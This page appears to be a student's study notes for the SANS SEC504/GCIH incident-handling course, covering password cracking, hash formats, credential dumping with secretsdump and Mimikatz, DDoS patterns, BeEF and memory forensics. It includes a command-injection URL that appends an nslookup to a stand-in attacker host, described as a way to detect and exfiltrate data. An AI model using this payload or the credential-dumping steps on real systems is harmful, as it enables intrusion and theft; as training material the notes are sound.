Course Notes > SEC504_Notes SANS Technology Institute SEC504/GCIH Notes

SEC504/GCIH Notes nmap --reason

SEC504/GCIH Notes nmap --reason <-- important for understanding why port is open nc -l -p 70000 <-- opens listening port 70000. linux. password cracking toolkit: sprayer toolkit (linux) pw cracking tools: THC Hydra, Burpse Suite.. PW Hashes: Windows: LANMAN, NTLM Linux/Unix: DES, 3DES, MD5, Blowfish, SHA-256, SHA-512 CPU/RAM intensive: bcrypt, scrypt, PBKDF2 NT Hashes are not to be confused with NTLMv1 and v2, an authentication algorithn/protocol. built-in ntdsutil.exe extract NTDS.dit snd SYSTEM hive using Impacket's secretsdump.py script Cain and Able – Windows based pw cracker. Hydra – Linux based pw cracker w/dictionary attacks. Mimikatz – post exploitation tool which dumps PWs from memory. John the Ripper (win/linux/unix)– brute force pw attack in “incremental mode” Single crack mode uses login names, GECOS, full name, fields and users’ home dir. As candidate PWs. External mode leverages program code of some functions to generate candidate PWs. LANMAN – very weak password-hashing mechanism in Server 2003. NTLMv1,v2 – Authentication algorithms, NOT hashing. DDoS Pulsing Zombies – bomb target with traffic for brief period like 10 min. go dormant for some time and go again. Difficult to trace it for the ISP that way. HTTP floods – blends into your overall traffic patterns best and may be very difficult to detect. /etc/shadow - PW Hashes stored on Unix In hashes in this file, the hash is the second colon-delimited field. $6 is used for SHA-512, $5 for SHA-256, $2 Blowfish, and $1 for MD5. Command injection eg.: http://AFinewebpage/cgi-bin/userData.pl?doc=user1.txt; nslookup MyEvilMachine.com. Also, Ping also works. Helps determine if this flaw is present on web server. Attacker can then stiff to see whether DNS requests came from the target for the attacker-controlled DNS server. Can be used to exfiltrate data. BeEF – Browser Exploitation Framework offers modular framework of features for controlling browsers. Must load a “hook” on an XSS-vulnerable site and when a victim access it, his browser contacts the BeEF server and attacker can control that browser with BeEF. RAT apps: Poison Ivy, Gh0st RAT, etc Immunity Debugger – malware debugger for reverse engineering. Rekall - RAM dumping and analysis Netstat -nao | find “ESTABLISHED” – shows local IP and ports, remote address and ports, includes PID. Filtering: select * from pslist() where_EPROCESS.name == “cmd.exe” / EPROCESS.pid ==1492 Dlllist 752, similar to tasklist /m /fi “pid eq 752”